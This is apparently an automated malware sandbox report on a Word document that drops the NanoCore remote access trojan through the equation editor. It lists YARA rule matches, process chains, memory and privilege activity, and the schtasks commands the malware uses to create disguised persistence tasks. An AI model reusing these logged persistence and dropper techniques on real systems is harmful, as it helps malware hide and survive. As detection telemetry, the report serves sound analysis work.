Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.560000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.560000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.367dacc.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.367dacc.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.catzjt7863.exe.359c310.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.catzjt7863.exe.359c310.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.706102715.0000000003676000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.704921985.0000000000550000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.704921985.0000000000550000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: catzjt7863.exe PID: 1848, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: catzjt7863.exe PID: 1848, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 2936, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_001A7356	4_2_001A7356
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_001A93F6	4_2_001A93F6
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_00340138	4_2_00340138
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_003489B2	4_2_003489B2
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_00341AC8	4_2_00341AC8
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_00341F90	4_2_00341F90
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_00340006	4_2_00340006
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_00349845	4_2_00349845
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_003450BB	4_2_003450BB
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_003430E8	4_2_003430E8
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_0034012A	4_2_0034012A
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_0034C22E	4_2_0034C22E
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_00348267	4_2_00348267
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_00341AB7	4_2_00341AB7
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_00342EA0	4_2_00342EA0
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_00342E8F	4_2_00342E8F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_00565AD1	7_2_00565AD1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_00563DFF	7_2_00563DFF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_00382418	7_2_00382418
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_003838C8	7_2_003838C8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_00389988	7_2_00389988
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_00388D88	7_2_00388D88
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_0038B658	7_2_0038B658
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_00383020	7_2_00383020
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_003830E7	7_2_003830E7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_0038A230	7_2_0038A230
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_00389A4F	7_2_00389A4F

Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_00430B8A NtQuerySystemInformation,	4_2_00430B8A
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_00430B59 NtQuerySystemInformation,	4_2_00430B59
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_003D16DA NtQuerySystemInformation,	7_2_003D16DA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_003D169F NtQuerySystemInformation,	7_2_003D169F

Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: catzx[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: catzjt7863.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: eWoGxZG.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Roaming\catzjt7863.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................................E.R.R.O.R.:. ... .......................N.......................................X...............................	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................................E.R.R.O.(.P..... .......................T...............................................X.......X...............	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ..................'.............x.'.....(.P.....`.......@.......P...............................................................................	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................................h.......(.P.....................................................................................................	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\catzjt7863.exe C:\Users\user\AppData\Roaming\catzjt7863.exe
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\eWoGxZG' /XML 'C:\Users\user\AppData\Local\Temp\tmp566B.tmp'
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp249A.tmp'
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {AC07D2CB-425B-43FA-983F-3B14071F638D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp1E64.tmp'
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe 0
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
Source: unknown	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\catzjt7863.exe C:\Users\user\AppData\Roaming\catzjt7863.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\eWoGxZG' /XML 'C:\Users\user\AppData\Local\Temp\tmp566B.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp249A.tmp'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp1E64.tmp'	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe 0	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0	Jump to behavior

Source: C:\Users\user\AppData\Roaming\catzjt7863.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_00430A0E AdjustTokenPrivileges,	4_2_00430A0E
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Code function: 4_2_004309D7 AdjustTokenPrivileges,	4_2_004309D7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_003D149A AdjustTokenPrivileges,	7_2_003D149A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 7_2_003D1463 AdjustTokenPrivileges,	7_2_003D1463

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$rchase order_122.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCEB.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@18/17@22/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: 7.0.RegSvcs.exe.400000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.0.RegSvcs.exe.400000.3.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.0.RegSvcs.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.0.RegSvcs.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.0.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.0.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.0.RegSvcs.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.0.RegSvcs.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 7.0.RegSvcs.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.0.RegSvcs.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
